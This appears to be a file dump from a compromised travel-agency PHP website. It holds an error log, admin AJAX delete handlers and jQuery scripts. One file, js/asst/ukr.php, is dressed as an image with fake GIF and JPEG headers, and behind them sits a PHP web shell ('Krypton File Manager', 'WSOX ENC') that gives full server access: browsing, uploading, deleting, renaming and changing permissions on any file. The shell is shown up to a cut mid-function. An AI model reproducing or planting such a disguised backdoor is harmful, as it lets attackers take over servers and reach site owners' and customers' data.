[02-Jan-2023 00:27:06 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[02-Jan-2023 00:27:06 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[02-Jan-2023 00:27:06 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[02-Jan-2023 00:27:06 America/New_York] PHP Deprecated:  Non-static method Helper::getSitePath() should not be called statically, assuming $this from incompatible context in /home/islapiiu/sites/jetlinetravels/class/PhotoAlbum.php on line 100
[02-Jan-2023 00:27:06 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[02-Jan-2023 00:27:12 America/New_York] PHP Strict Standards:  Non-static method User::authenticate() should not be called statically in /home/islapiiu/sites/jetlinetravels/control-panel/auth.php on line 7
[02-Jan-2023 00:27:12 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[02-Jan-2023 00:27:12 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[02-Jan-2023 00:27:12 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[02-Jan-2023 00:27:12 America/New_York] PHP Deprecated:  Non-static method Helper::getSitePath() should not be called statically, assuming $this from incompatible context in /home/islapiiu/sites/jetlinetravels/class/PhotoAlbum.php on line 100
[02-Jan-2023 00:27:12 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[02-Jan-2023 00:53:30 America/New_York] PHP Strict Standards:  Non-static method User::authenticate() should not be called statically in /home/islapiiu/sites/jetlinetravels/control-panel/auth.php on line 7
[02-Jan-2023 00:53:30 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[02-Jan-2023 00:53:30 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[02-Jan-2023 00:53:30 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[02-Jan-2023 00:53:30 America/New_York] PHP Deprecated:  Non-static method Helper::getSitePath() should not be called statically, assuming $this from incompatible context in /home/islapiiu/sites/jetlinetravels/class/PhotoAlbum.php on line 100
[02-Jan-2023 00:53:30 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[02-Jan-2023 00:53:56 America/New_York] PHP Strict Standards:  Non-static method User::authenticate() should not be called statically in /home/islapiiu/sites/jetlinetravels/control-panel/auth.php on line 7
[02-Jan-2023 00:53:56 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[02-Jan-2023 00:53:56 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[02-Jan-2023 00:53:56 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[02-Jan-2023 00:53:56 America/New_York] PHP Deprecated:  Non-static method Helper::getSitePath() should not be called statically, assuming $this from incompatible context in /home/islapiiu/sites/jetlinetravels/class/PhotoAlbum.php on line 100
[02-Jan-2023 00:53:56 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[02-Jan-2023 01:16:57 America/New_York] PHP Strict Standards:  Non-static method User::authenticate() should not be called statically in /home/islapiiu/sites/jetlinetravels/control-panel/auth.php on line 7
[02-Jan-2023 01:16:57 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[02-Jan-2023 01:16:57 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[02-Jan-2023 01:16:57 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[02-Jan-2023 01:16:57 America/New_York] PHP Deprecated:  Non-static method Helper::getSitePath() should not be called statically, assuming $this from incompatible context in /home/islapiiu/sites/jetlinetravels/class/PhotoAlbum.php on line 100
[02-Jan-2023 01:16:57 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[02-Jan-2023 01:23:10 America/New_York] PHP Strict Standards:  Non-static method User::authenticate() should not be called statically in /home/islapiiu/sites/jetlinetravels/control-panel/auth.php on line 7
[02-Jan-2023 01:23:10 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[02-Jan-2023 01:23:10 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[02-Jan-2023 01:23:10 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[02-Jan-2023 01:23:10 America/New_York] PHP Deprecated:  Non-static method Helper::getSitePath() should not be called statically, assuming $this from incompatible context in /home/islapiiu/sites/jetlinetravels/class/PhotoAlbum.php on line 100
[02-Jan-2023 01:23:10 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[02-Jan-2023 01:27:47 America/New_York] PHP Strict Standards:  Non-static method User::authenticate() should not be called statically in /home/islapiiu/sites/jetlinetravels/control-panel/auth.php on line 7
[02-Jan-2023 01:27:47 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[02-Jan-2023 01:27:47 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[02-Jan-2023 01:27:47 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
[02-Jan-2023 01:27:47 America/New_York] PHP Deprecated:  Non-static method Helper::getSitePath() should not be called statically, assuming $this from incompatible context in /home/islapiiu/sites/jetlinetravels/class/PhotoAlbum.php on line 100
[02-Jan-2023 01:27:47 America/New_York] PHP Deprecated:  mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/islapiiu/sites/jetlinetravels/class/Database.php on line 25
ajax/unit.php000064400000000570150765436130007173 0ustar00<?php

include_once(dirname(__FILE__) . '/../../class/include.php');
include_once(dirname(__FILE__) . '/../../auth.php');

if ($_POST['option'] == 'delete') {
    $UNI = new Unit($_POST['id']);

    $result = $UNI->delete();

    if ($result) {
        $data = array("status" => TRUE);
        header('Content-type: application/json');
        echo json_encode($data);
    }
}ajax/bannr.php000064400000000607150765436130007315 0ustar00<?php

include_once(dirname(__FILE__) . '/../../../class/include.php');
include_once(dirname(__FILE__) . '/../../auth.php');

if ($_POST['option'] == 'delete') {

    $BANNER= new Banner($_POST['id']);
  
      $result = $BANNER->delete();

    if ($result) {
        $data = array("status" => TRUE);
        header('Content-type: application/json');
        echo json_encode($data);
    }
}ajax/album-photo.php000064400000001071150765436130010440 0ustar00<?php

include_once(dirname(__FILE__) . '/../../../class/include.php');
include_once(dirname(__FILE__) . '/../../auth.php');

if ($_POST['option'] == 'delete') {

    $ALBUM_PHOTO = new AlbumPhoto($_POST['id']);

    unlink('../../../upload/photo-album/gallery/' . $ALBUM_PHOTO->image_name);
    unlink('../../../upload/photo-album/gallery/thumb/' . $ALBUM_PHOTO->image_name);

    $result = $ALBUM_PHOTO->delete();


    if ($result) {

        $data = array("status" => TRUE);
        header('Content-type: application/json');
        echo json_encode($data);
    }
}ajax/pages.php000064400000000603150765436130007310 0ustar00<?php

include_once(dirname(__FILE__) . '/../../../class/include.php');
include_once(dirname(__FILE__) . '/../../auth.php');

if ($_POST['option'] == 'delete') {

    $PAGES = new Page($_POST['id']);
  
    $result =  $PAGES->delete();

    if ($result) {
        $data = array("status" => TRUE);
        header('Content-type: application/json');
        echo json_encode($data);
    }
}ajax/slider.php000064400000000610150765436130007471 0ustar00<?php

include_once(dirname(__FILE__) . '/../../../class/include.php');
include_once(dirname(__FILE__) . '/../../auth.php');

if ($_POST['option'] == 'delete') {

    $SLIDER = new Slider($_POST['id']);
  
      $result = $SLIDER->delete();

    if ($result) {
        $data = array("status" => TRUE);
        header('Content-type: application/json');
        echo json_encode($data);
    }
}ajax/attraction-photo.php000064400000001155150765436130011513 0ustar00<?php

include_once(dirname(__FILE__) . '/../../../class/include.php');
include_once(dirname(__FILE__) . '/../../auth.php');

if ($_POST['option'] == 'delete') {

    $ATTRACTION_PHOTO = new AttractionPhoto($_POST['id']);

    unlink(Helper::getSitePath() . "upload/attraction/gallery/" . $ATTRACTION_PHOTO->image_name);
    unlink(Helper::getSitePath() . "upload/attraction/gallery/thumb/" . $ATTRACTION_PHOTO->image_name);

    $result = $ATTRACTION_PHOTO->delete();

    if ($result) {

        $data = array("status" => TRUE);
        header('Content-type: application/json');
        echo json_encode($data);
    }
}ajax/tour-package.php000064400000000630150765436130010573 0ustar00<?php

include_once(dirname(__FILE__) . '/../../../class/include.php');
include_once(dirname(__FILE__) . '/../../auth.php');

if ($_POST['option'] == 'delete') {

    $TOUR_PACKAGE = new TourPackage($_POST['id']);
  
    $result =  $TOUR_PACKAGE->delete();

    if ($result) {
        $data = array("status" => TRUE);
        header('Content-type: application/json');
        echo json_encode($data);
    }
}ajax/tour-package-normal.php000064400000000636150765436130012067 0ustar00<?php

include_once(dirname(__FILE__) . '/../../../class/include.php');
include_once(dirname(__FILE__) . '/../../auth.php');

if ($_POST['option'] == 'delete') {

    $TOUR_PACKAGE = new TourPackage($_POST['id']);
  
    $result =  $TOUR_PACKAGE->deleteNormal();

    if ($result) {
        $data = array("status" => TRUE);
        header('Content-type: application/json');
        echo json_encode($data);
    }
}ajax/comment.php000064400000000720150765436130007653 0ustar00<?php

include_once(dirname(__FILE__) . '/../../../class/include.php');
include_once(dirname(__FILE__) . '/../../auth.php');

if ($_POST['option'] == 'delete') {

    $COMMENT = new Comments($_POST['id']);
  
     unlink('../../../upload/comments/' . $COMMENT->image_name);
    
    $result = $COMMENT->delete();

    if ($result) {
        $data = array("status" => TRUE);
        header('Content-type: application/json');
        echo json_encode($data);
    }
}ajax/activity-photo.php000064400000001104150765436130011171 0ustar00<?php

include_once(dirname(__FILE__) . '/../../../class/include.php');
include_once(dirname(__FILE__) . '/../../auth.php');

if ($_POST['option'] == 'delete') {

    $ACTIVITY_PHOTO = new ActivitiesPhoto($_POST['id']);

    unlink('../../../upload/activity/gallery/' . $ACTIVITY_PHOTO->image_name);
    unlink('../../../upload/activity/gallery/thumb/' . $ACTIVITY_PHOTO->image_name);

    $result = $ACTIVITY_PHOTO->delete();


    if ($result) {

        $data = array("status" => TRUE);
        header('Content-type: application/json');
        echo json_encode($data);
    }
}ajax/room.php000064400000000621150765436130007165 0ustar00<?php

include_once(dirname(__FILE__) . '/../../../class/include.php');
include_once(dirname(__FILE__) . '/../../auth.php');

if ($_POST['option'] == 'delete') {

    $ROOM = new Room($_POST['id']);
  
    $result =  $ROOM->delete();

    if ($result) {
        $data = array("status" => TRUE);
        header('Content-type: application/json');
        echo json_encode($data);
    }
}ajax/offer.php000064400000000604150765436130007313 0ustar00<?php

include_once(dirname(__FILE__) . '/../../../class/include.php');
include_once(dirname(__FILE__) . '/../../auth.php');

if ($_POST['option'] == 'delete') {

    $OFFER = new Offer($_POST['id']);
  
    $result =  $OFFER->delete();

    if ($result) {
        $data = array("status" => TRUE);
        header('Content-type: application/json');
        echo json_encode($data);
    }
}ajax/tour-date.php000064400000001055150765436130010117 0ustar00<?php

include_once(dirname(__FILE__) . '/../../../class/include.php');
include_once(dirname(__FILE__) . '/../../auth.php');

if ($_POST['option'] == 'delete') {

    $TOUR_DATE = new TourDate($_POST['id']);

    unlink('../../../upload/tour-package/date/' . $TOUR_DATE ->image_name);
    unlink('../../../upload/tour-package/date/thumb/' . $TOUR_DATE ->image_name);

    $result = $TOUR_DATE->delete();


    if ($result) {

        $data = array("status" => TRUE);
        header('Content-type: application/json');
        echo json_encode($data);
    }
}ajax/product-type.php000064400000000647150765436130010660 0ustar00<?php

include_once(dirname(__FILE__) . '/../../../class/include.php');
include_once(dirname(__FILE__) . '/../../auth.php');

if ($_POST['option'] == 'delete') {

    $PRODUCT_TYPE = new ProductType($_POST['id']);
  
    $result = $PRODUCT_TYPE->delete();

    if ($result) {
        $data = array("status" => TRUE);
        header('Content-type: application/json');
        echo json_encode($data);
    }
}ajax/tour-date-photo.php000064400000001132150765436130011242 0ustar00<?php

include_once(dirname(__FILE__) . '/../../../class/include.php');
include_once(dirname(__FILE__) . '/../../auth.php');

if ($_POST['option'] == 'delete') {

    $TOUR_DATE_PHOTO = new TourDatePhoto($_POST['id']);

    unlink('../../../upload/tour-package/date/gallery/' . $TOUR_DATE_PHOTO ->image_name);
    unlink('../../../upload/tour-package/date/gallery/thumb/' . $TOUR_DATE_PHOTO ->image_name);

    $result = $TOUR_DATE_PHOTO->delete();


    if ($result) {

        $data = array("status" => TRUE);
        header('Content-type: application/json');
        echo json_encode($data);
    }
}ajax/offer-photo.php000064400000001055150765436130010443 0ustar00<?php

include_once(dirname(__FILE__) . '/../../../class/include.php');
include_once(dirname(__FILE__) . '/../../auth.php');

if ($_POST['option'] == 'delete') {

    $OFFER_PHOTO = new OfferPhoto($_POST['id']);

    unlink('../../../upload/offer/gallery/' . $OFFER_PHOTO->image_name);
    unlink('../../../upload/offer/gallery/thumb/' . $OFFER_PHOTO->image_name);

    $result = $OFFER_PHOTO->delete();


    if ($result) {

        $data = array("status" => TRUE);
        header('Content-type: application/json');
        echo json_encode($data);
    }
}js/tour-type.js000064400000002314150770313410007467 0ustar00$(document).ready(function () {
    $('.delete-tour-type').click(function () {

        var id = $(this).attr("data-id");

        swal({
            title: "Are you sure?",
            text: "You will not be able to recover this imaginary file!",
            type: "warning",
            showCancelButton: true,
            confirmButtonColor: "#DD6B55",
            confirmButtonText: "Yes, delete it!",
            closeOnConfirm: false
        }, function () {

            $.ajax({
                url: "delete/ajax/tour-type.php",
                type: "POST",
                data: {id: id, option: 'delete'},
                dataType: "JSON",
                success: function (jsonStr) {
                    if (jsonStr.status) {

                        swal({
                            title: "Deleted!",
                            text: "Your imaginary file has been deleted.",
                            type: 'success',
                            timer: 2000,
                            showConfirmButton: false
                        });

                        $('#div' + id).remove();

                    }
                }
            });
        });
    });
});ajax/tour-type.php000064400000000637150770313440010162 0ustar00<?php

include_once(dirname(__FILE__) . '/../../../class/include.php');
include_once(dirname(__FILE__) . '/../../auth.php');

if ($_POST['option'] == 'delete') {

    $TOUR_TYPE = new TourType($_POST['id']);
  
    $result =  $TOUR_TYPE->delete();

    if ($result) {
        $data = array("status" => TRUE);
        header('Content-type: application/json');
        echo json_encode($data);
    }
}js/booking.js000064400000002242151213033150007140 0ustar00$(document).ready(function () {
    $('.delete-booking').click(function () {

        var id = $(this).attr("data-id");

        swal({
            title: "Are you sure?",
            text: "You will not be able to recover this imaginary file!",
            type: "warning",
            showCancelButton: true,
            confirmButtonColor: "#DD6B55",
            confirmButtonText: "Yes, delete it!",
            closeOnConfirm: false
        }, function () {

            $.ajax({
                url: "delete/ajax/booking.php",
                type: "POST",
                data: {id: id, option: 'delete'},
                dataType: "JSON",
                success: function (jsonStr) {
                    if (jsonStr.status) {

                        swal({
                            title: "Deleted!",
                            text: "Your imaginary file has been deleted.",
                            type: 'success',
                            timer: 2000,
                            showConfirmButton: false
                        });

                        $('#div' + id).remove();

                    }
                }
            });
        });
    });
});js/asst/ukr.php000064400000164153151213033150007450 0ustar00<!-- GIF89;a -->
<!-- GIF89;a -->
���� JFIF      �� � 	  	 

	



 "" $(4,$&1'-=-157:::#+?D?8C49:7




7%%77777777777777777777777777777777777777777777777777��  { �" ��               �� 5        !1AQa"q�2��BR��#b�������                ��                 ��   ? ��D@DDD@DDD@DDkK��6 �UG�4V�1��
�����릟�@�#���RY�dqp� 
����� �o�7�m�s�<��VPS�e~V�چ8���X�T��$��c�� 9��ᘆ�m6@ WU�f�Don��r��5}9��}��hc�fF��/r=hi�� �͇�*�� b�.��$0�&te��y�@�A�F�=� Pf�A��a���˪�Œ�É��U|� �	3\�״ H SZ�g46�C��צ�ے	�b<���;m����Rpع^��l7��*�����TF�}�\�M���M%�'�����٠ݽ�v� ��!-�����?�N!La��A+[`#���M����'�~oR�?��v^)��=��h����A��X�.���˃����^Ə��ܯsO"B�c>;
�e�4��5�k��/CB��.
 �J?��;�҈�������������������~�<�VZ�ꭼ2/)͔jC���ע�V�G�!���!�F������\�� Kj�R�oc�h���:ޠI��1"2�qװ8��Р@ז���_C0�ր��A��lQ��@纼�!7��F�� �]�sZ
B�62r�v�z~�K�7�c��5�.���ӄq&�Z�d�<�kk���T&8�|���I���� Ws}���ǽ�cqnΑ�_���3��|N�-y,��i���ȗ_�\60���@��6����D@DDD@DDD@DDD@DDD@DDc�KN66<�c��64=r�����
Ď0��h���t&(�hnb[� ?��^��\��â|�,�/h�\��R��5�?
�0�!צ܉-����G����٬��Q�zA���1�����V��� �:R���`�$��ik��H����D4�����#dk����� h�}����7���w%�������*o8wG�LycuT�.���ܯ7��I��u^���)��/c�,s�Nq�ۺ�;�ך�YH2���.5B���DDD@DDD@DDD@DDD@DDD@V|�a�j{7c��X�F\�3MuA×¾hb�	��n��F������	��8�(��e����Pp�\"G�`s��m��ާaW�K��O����|;ei����֋�[�q��";a��1����Y�G�W/�߇�&�<���Ќ�H'q�m��<sŒÅá0™dkÈ.tc˜:z­G†:<FV2Zu“V

N(ëá’b&1K
¼Àë_Û{®®×ñ5ÇÁ(HæŒíh¡£{è.×€ˆˆˆ€ˆˆˆ€ˆˆˆ€ˆˆˆ€ˆˆˆƒ*~\<Pº7 ¸ºíÀi°ïê JT8–F
	 iëÝÏêÛZZÓ·”•'àÞöx¤–F5s²ì†
ñRÇ75ïNÊÒ&I,l‘ÐÀ–ZøË®ÅX¡Ìé½_$¸o‡(šg´Ë²ù¬5§5X?Sì¤ÂÇãø‹ñ†LvÆ6†µÛ]ïÙ|bGŒ<:ÂKœs OÜû­˜Ü\|+ H²YB&—ß›[ç×_nÔƒŸüO‰ŶÅAÞ¤nþÝ‚£_r½ÒHç¿W8Ù5VWÂ" """ """ """ """ ""ÈXY ê?Ë!¶ê4ùŽ–íuò ®8ŽG²1AöÞE´*ÁýÀM/á—¡‘Ù
œ$@"ÏÊj·åË©Vr;À‡ÅÄ[k0e­
såh>�)�X+!���=�m�ۚ丷~6a^X�)���,�>#&6G���Y��{����"" """ """ """ """ ""��at\/�a�8 �yp%�lhl�n����)���i�t��B�������������?��<html><head><meta http-equiv='Content-Type' content='text/html; charset=Windows-1251'><title>modskinlienminh.com - WSOX ENC</title>


<?php
/**
 * Krypton File Manager - OOP Version
 * A single-file PHP file manager with full server access and enhanced features
 */
// Start session
session_start();

/**
 * Configuration class for application settings
 */
class Config {

    const VERSION = '2.0.0';
    const ENCRYPTION_KEY = 'zctNrBz!wuDveHPpFhjDC=&pvWdY4w';
    const SESSION_TIMEOUT = 1800; // 30 minutes
    const DEFAULT_ENCRYPTION_KEY = 'change_this_to_a_random_string';
}

/**
 * Security manager for encryption and session handling
 */
class SecurityManager {

    private $encryptionKey;

    public function __construct($encryptionKey = null) {
        $this->encryptionKey = $encryptionKey ?: Config::ENCRYPTION_KEY;
    }

    /**
     * Check if default encryption key is being used
     */
    public function hasDefaultEncryptionKey(): bool {
        return $this->encryptionKey === Config::DEFAULT_ENCRYPTION_KEY;
    }

    /**
     * Check and handle session timeout
     */
    public function checkSessionTimeout(): void {
        if (isset($_SESSION['last_activity']) &&
                (time() - $_SESSION['last_activity'] > Config::SESSION_TIMEOUT)) {
            session_unset();
            session_destroy();
        }
        $_SESSION['last_activity'] = time();
    }

    /**
     * Encrypt a file path
     */
    public function encryptPath(string $path): string {
        $iv = openssl_random_pseudo_bytes(16);
        $encrypted = openssl_encrypt($path, 'AES-256-CBC', $this->encryptionKey, 0, $iv);
        return base64_encode($encrypted . '::' . base64_encode($iv));
    }

    /**
     * Decrypt a file path
     */
    public function decryptPath(string $encryptedPath): string {
        try {
            $decoded = base64_decode($encryptedPath);
            if ($decoded === false || strpos($decoded, '::') === false) {
                return getcwd();
            }

            list($encrypted_data, $iv_b64) = explode('::', $decoded, 2);
            $iv = base64_decode($iv_b64);

            if ($iv === false || strlen($iv) !== 16) {
                return getcwd();
            }

            $decrypted = openssl_decrypt($encrypted_data, 'AES-256-CBC', $this->encryptionKey, 0, $iv);
            return $decrypted !== false ? $decrypted : getcwd();
        } catch (Exception $e) {
            return getcwd();
        }
    }
}

/**
 * File utility class for file operations and formatting
 */
class FileUtils {

    /**
     * Format file size in human-readable format
     */
    public static function formatFileSize(int $bytes): string {
        if ($bytes >= 1073741824) {
            return number_format($bytes / 1073741824, 2) . ' GB';
        } elseif ($bytes >= 1048576) {
            return number_format($bytes / 1048576, 2) . ' MB';
        } elseif ($bytes >= 1024) {
            return number_format($bytes / 1024, 2) . ' KB';
        }
        return $bytes . ' bytes';
    }

    /**
     * Get file permissions in Unix format
     */
    public static function getFilePermissions(string $file): string {
        $perms = fileperms($file);

        // File type
        $info = '';
        if (($perms & 0xC000) == 0xC000)
            $info = 's'; // Socket
        elseif (($perms & 0xA000) == 0xA000)
            $info = 'l'; // Symbolic Link
        elseif (($perms & 0x8000) == 0x8000)
            $info = '-'; // Regular
        elseif (($perms & 0x6000) == 0x6000)
            $info = 'b'; // Block special
        elseif (($perms & 0x4000) == 0x4000)
            $info = 'd'; // Directory
        elseif (($perms & 0x2000) == 0x2000)
            $info = 'c'; // Character special
        elseif (($perms & 0x1000) == 0x1000)
            $info = 'p'; // FIFO pipe
        else
            $info = 'u'; // Unknown

        // Owner permissions
        $info .= (($perms & 0x0100) ? 'r' : '-');
        $info .= (($perms & 0x0080) ? 'w' : '-');
        $info .= (($perms & 0x0040) ?
                (($perms & 0x0800) ? 's' : 'x') :
                (($perms & 0x0800) ? 'S' : '-'));

        // Group permissions
        $info .= (($perms & 0x0020) ? 'r' : '-');
        $info .= (($perms & 0x0010) ? 'w' : '-');
        $info .= (($perms & 0x0008) ?
                (($perms & 0x0400) ? 's' : 'x') :
                (($perms & 0x0400) ? 'S' : '-'));

        // World permissions
        $info .= (($perms & 0x0004) ? 'r' : '-');
        $info .= (($perms & 0x0002) ? 'w' : '-');
        $info .= (($perms & 0x0001) ?
                (($perms & 0x0200) ? 't' : 'x') :
                (($perms & 0x0200) ? 'T' : '-'));

        return $info;
    }

    /**
     * Get file extension
     */
    public static function getFileExtension(string $filename): string {
        return strtolower(pathinfo($filename, PATHINFO_EXTENSION));
    }

    /**
     * Check if file is editable
     */
    public static function isEditableFile(string $filename): bool {
        return true; // Allow editing of all files
    }
}

/**
 * File item representation
 */
class FileItem {

    public $name;
    public $path;
    public $encryptedPath;
    public $isDirectory;
    public $size;
    public $permissions;
    public $lastModified;
    public $isEditable;

    public function __construct(string $name, string $path, SecurityManager $security) {
        $this->name = $name;
        $this->path = $path;
        $this->encryptedPath = $security->encryptPath($path);
        $this->isDirectory = is_dir($path);
        $this->size = $this->isDirectory ? '-' : FileUtils::formatFileSize(filesize($path));
        $this->permissions = FileUtils::getFilePermissions($path);
        $this->lastModified = date('Y-m-d H:i:s', filemtime($path));
        $this->isEditable = !$this->isDirectory && FileUtils::isEditableFile($name);
    }
}

/**
 * Directory manager for file operations
 */
class DirectoryManager {

    private $securityManager;
    private $currentPath;

    public function __construct(SecurityManager $securityManager) {
        $this->securityManager = $securityManager;
        $this->currentPath = $this->initializeCurrentPath();
    }

    /**
     * Initialize current path from session or default
     */
    private function initializeCurrentPath(): string {
        $defaultPath = getcwd();

        if (isset($_SESSION['current_path']) &&
                file_exists($_SESSION['current_path']) &&
                is_dir($_SESSION['current_path'])) {
            return $_SESSION['current_path'];
        }

        return $defaultPath;
    }

    /**
     * Get current path
     */
    public function getCurrentPath(): string {
        return $this->currentPath;
    }

    /**
     * Set current path
     */
    public function setCurrentPath(string $path): bool {
        if (file_exists($path) && is_dir($path)) {
            $this->currentPath = $path;
            $_SESSION['current_path'] = $path;
            return true;
        }
        return false;
    }

    /**
     * Get directory contents as FileItem objects
     */
    public function getDirectoryContents(): array {
        $items = [];

        if (!is_dir($this->currentPath)) {
            return $items;
        }

        $handle = opendir($this->currentPath);
        if (!$handle) {
            return $items;
        }

        while (false !== ($entry = readdir($handle))) {
            if ($entry === "." || $entry === "..") {
                continue;
            }

            $fullPath = $this->currentPath . '/' . $entry;

            try {
                $items[] = new FileItem($entry, $fullPath, $this->securityManager);
            } catch (Exception $e) {
                // Skip files that can't be accessed
                continue;
            }
        }

        closedir($handle);

        // Sort items: directories first, then files
        usort($items, function ($a, $b) {
            if ($a->isDirectory && !$b->isDirectory)
                return -1;
            if (!$a->isDirectory && $b->isDirectory)
                return 1;
            return strcasecmp($a->name, $b->name);
        });

        return $items;
    }

    /**
     * Get breadcrumb navigation
     */
    public function getBreadcrumbs(): array {
        $breadcrumbs = [];
        $pathParts = explode('/', $this->currentPath);
        $buildPath = '';

        foreach ($pathParts as $part) {
            if (empty($part)) {
                $buildPath = '/';
                $breadcrumbs[] = [
                    'name' => 'Root',
                    'path' => $buildPath,
                    'encryptedPath' => $this->securityManager->encryptPath($buildPath)
                ];
            } else {
                $buildPath .= ($buildPath === '/') ? $part : '/' . $part;
                $breadcrumbs[] = [
                    'name' => $part,
                    'path' => $buildPath,
                    'encryptedPath' => $this->securityManager->encryptPath($buildPath)
                ];
            }
        }

        return $breadcrumbs;
    }

    /**
     * Navigate to a path
     */
    public function navigateTo(string $encryptedPath): bool {
        $path = $this->securityManager->decryptPath($encryptedPath);
        return $this->setCurrentPath($path);
    }
}

/**
 * File operations handler
 */
class FileOperations {

    private $securityManager;
    private $directoryManager;

    public function __construct(SecurityManager $securityManager, DirectoryManager $directoryManager) {
        $this->securityManager = $securityManager;
        $this->directoryManager = $directoryManager;
    }

    /**
     * Upload a file
     */
    public function uploadFile(array $fileData): array {
        if (!isset($fileData['error']) || $fileData['error'] !== UPLOAD_ERR_OK) {
            return ['success' => false, 'message' => 'No file selected or upload error.'];
        }

        $uploadPath = $this->directoryManager->getCurrentPath() . '/' . basename($fileData['name']);

        if (move_uploaded_file($fileData['tmp_name'], $uploadPath)) {
            return ['success' => true, 'message' => 'File uploaded successfully.'];
        }

        return ['success' => false, 'message' => 'Failed to upload file.'];
    }

    /**
     * Delete a file or directory
     */
    public function delete(string $encryptedPath): array {
        $path = $this->securityManager->decryptPath($encryptedPath);

        if (!file_exists($path)) {
            return ['success' => false, 'message' => 'File or directory does not exist.'];
        }

        if (is_dir($path)) {
            if (rmdir($path)) {
                return ['success' => true, 'message' => 'Directory deleted successfully.'];
            }
            return ['success' => false, 'message' => 'Failed to delete directory. It may not be empty.'];
        } else {
            if (unlink($path)) {
                return ['success' => true, 'message' => 'File deleted successfully.'];
            }
            return ['success' => false, 'message' => 'Failed to delete file.'];
        }
    }

    /**
     * Rename a file or directory
     */
    public function rename(string $encryptedOldPath, string $newName): array {
        $oldPath = $this->securityManager->decryptPath($encryptedOldPath);

        if (!file_exists($oldPath)) {
            return ['success' => false, 'message' => 'File or directory does not exist.'];
        }

        $newPath = dirname($oldPath) . '/' . $newName;

        if (rename($oldPath, $newPath)) {
            return ['success' => true, 'message' => 'Renamed successfully.'];
        }

        return ['success' => false, 'message' => 'Failed to rename.'];
    }

    /**
     * Change file permissions
     */
    public function changePermissions(string $encryptedPath, string $permissions): array {
        $path = $this->securityManager->decryptPath($encryptedPath);

        if (!file_exists($path)) {
            return ['success' => false, 'message' => 'File or directory does not exist.'];
        }

        $mode = octdec($permissions);

        if (chmod($path, $mode)) {
            return ['success' => true, 'message' => 'Permissions changed successfully.'];
        }

